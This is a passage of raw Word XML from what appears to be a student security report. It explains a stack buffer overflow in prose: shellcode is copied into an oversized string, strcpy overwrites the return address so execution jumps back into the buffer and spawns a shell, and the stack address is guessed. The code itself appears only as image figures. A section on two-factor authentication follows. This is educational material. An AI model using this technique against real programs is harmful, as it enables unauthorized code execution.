          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 14 shows the “disassemble main” command that is run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF1F70" w14:textId="3555BBA5" w:rsidR="000D4482" w:rsidRDefault="000D4482" w:rsidP="001537E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350C6602" w14:textId="29CF9E54" w:rsidR="000D4482" w:rsidRDefault="000D4482" w:rsidP="001537E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B055806" wp14:editId="2748AADD">
            <wp:extent cx="5943600" cy="37877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787775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF9BF47" w14:textId="2D3C88CA" w:rsidR="000D4482" w:rsidRDefault="000D4482" w:rsidP="000D4482">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06587E4F" w14:textId="0BF256C6" w:rsidR="00253E99" w:rsidRDefault="00253E99" w:rsidP="000D4482">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF794A3" w14:textId="64C30C8A" w:rsidR="00253E99" w:rsidRDefault="00C43773" w:rsidP="00253E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">e.  </w:t>
      </w:r>
      <w:r w:rsidR="003607DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 15 shows the “disassemble __execve” command that is run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C4E3E6" w14:textId="0167B943" w:rsidR="003607DF" w:rsidRDefault="003607DF" w:rsidP="00253E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033AF67E" w14:textId="5877A170" w:rsidR="003607DF" w:rsidRDefault="00CE68C0" w:rsidP="00253E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C1D45F2" wp14:editId="42ABEB88">
            <wp:extent cx="5943600" cy="4747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747895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00792826" w14:textId="05AA1AAD" w:rsidR="00CE68C0" w:rsidRDefault="00CE68C0" w:rsidP="00CE68C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CE243B" w14:textId="2450CCEB" w:rsidR="009620AF" w:rsidRDefault="009620AF" w:rsidP="00CE68C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD212E9" w14:textId="6F1E1E7B" w:rsidR="009620AF" w:rsidRDefault="009620AF" w:rsidP="009620AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-270" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.  Final Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71845A34" w14:textId="7D85711A" w:rsidR="009620AF" w:rsidRDefault="009620AF" w:rsidP="009620AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-270" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0350E829" w14:textId="057D3E7C" w:rsidR="009620AF" w:rsidRDefault="00C21427" w:rsidP="00C21427">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a.  </w:t>
      </w:r>
      <w:r w:rsidR="00F3604D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now, we have the shell code. We know it must be part of the string which we will use to overflow the buffer. We know we must point the return address back into the buffer. The code in the Figure 16 demonstrates these points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C10E4AC" w14:textId="7F2146E5" w:rsidR="00F3604D" w:rsidRDefault="00F3604D" w:rsidP="00C21427">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA9BC3B" w14:textId="7A92C5F3" w:rsidR="00F3604D" w:rsidRDefault="00F3604D" w:rsidP="00C21427">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46DBF1BA" wp14:editId="16634D22">
            <wp:extent cx="5943600" cy="3132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32455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC0E8BF" w14:textId="3EA3124D" w:rsidR="00F3604D" w:rsidRDefault="00F3604D" w:rsidP="00F3604D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1101DC5B" w14:textId="0F6F545F" w:rsidR="00F3604D" w:rsidRDefault="00F3604D" w:rsidP="00F3604D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0474AA" w14:textId="787EFDF1" w:rsidR="00F3604D" w:rsidRDefault="0078683D" w:rsidP="0078683D">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What we have done above is filled the array large_string[] with the address of buffer[], which is where our code will be. Then we copy our shellcode into the beginning of the large_string string. strcpy() will then copy large_string onto buffer without doing any bounds checking, and will overflow the return address, overwriting it with the address where our code is now located. Once we reach the end of the main, it tried to return it jumps to our code, and execs a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE10854" w14:textId="66094911" w:rsidR="00AE2422" w:rsidRDefault="00AE2422" w:rsidP="0078683D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D45071E" w14:textId="6080182A" w:rsidR="00AE2422" w:rsidRDefault="00AE2422" w:rsidP="0078683D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">b.  </w:t>
      </w:r>
      <w:r w:rsidR="005B202B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 17 shows the compilation of the above code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2BDAA0" w14:textId="066EFE07" w:rsidR="005B202B" w:rsidRDefault="005B202B" w:rsidP="0078683D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B13F41C" w14:textId="06AEEEF4" w:rsidR="005B202B" w:rsidRDefault="005B202B" w:rsidP="0078683D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1359745B" wp14:editId="25033257">
            <wp:extent cx="5943600" cy="1315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315085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0011B4BA" w14:textId="021702B5" w:rsidR="005B202B" w:rsidRDefault="005B202B" w:rsidP="005B202B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CF941F" w14:textId="01725637" w:rsidR="005B202B" w:rsidRDefault="005B202B" w:rsidP="005B202B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A622425" w14:textId="655849C6" w:rsidR="005B202B" w:rsidRDefault="005B202B" w:rsidP="005B202B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>c.  Figure 18 shows the running of the above code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07132812" w14:textId="04F4E6AD" w:rsidR="005B202B" w:rsidRDefault="005B202B" w:rsidP="005B202B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42422DCD" w14:textId="202531C0" w:rsidR="005B202B" w:rsidRDefault="005B202B" w:rsidP="005B202B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="667F619E" wp14:editId="5BBDEC75">
            <wp:extent cx="5943600" cy="14109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410970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF26625" w14:textId="6B9FD0B0" w:rsidR="005B202B" w:rsidRDefault="005B202B" w:rsidP="005B202B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D15D277" w14:textId="376453A4" w:rsidR="00516D00" w:rsidRPr="00516D00" w:rsidRDefault="00516D00" w:rsidP="00516D00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The problem we are faced when trying to overflow the buffer of another program is trying to figure out at what address the buffer (and thus our code) will be. The answer is that for every program the stack will start at the same address. Most programs do not push more than a few hundred or a few thousand bytes into the stack at any one time.</w:t>
      </w:r>
      <w:r w:rsidR="009A01B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B6F97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Therefore,</w:t>
      </w:r>
      <w:r w:rsidR="009A01B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by knowing where the stack starts we can try to guess where the buffer we are trying to overflow will be.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CF1991" w14:textId="77777777" w:rsidR="00B83252" w:rsidRDefault="00B83252" w:rsidP="004F313F">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70483B92" w14:textId="3F57795F" w:rsidR="00D22D12" w:rsidRDefault="00814845" w:rsidP="00814845">
      <w:pPr>
        <w:ind w:left="-720" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">12.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00814845">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Current Security Technology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D244074" w14:textId="598190D8" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>One existing security solution that has gained significant popularity is Two-Factor Authentication (2FA). 2FA is a security protocol designed to add an extra layer of protection to user accounts by requiring two different types of authentication factors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39078284" w14:textId="776C1585" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The system operation process of 2FA typically involves the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A557441" w14:textId="08829451" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>User Initiation: When a user attempts to access a protected resource, such as logging into an online account, they provide their username and password as the initial authentication factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172C5FDB" w14:textId="1480AACA" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Request for Second Factor: After successful submission of the initial authentication factor, the system recognizes the need for an additional factor and prompts the user to provide it. The second factor is typically something the user possesses or something inherent to their identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C662290" w14:textId="77777777" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Second Factor Authentication: The user provides the second factor, which can be one of the following types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1548A52A" w14:textId="77777777" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a. SMS or Email Code: The user receives a one-time code via SMS or email and enters it into the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF4EE3D" w14:textId="77777777" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
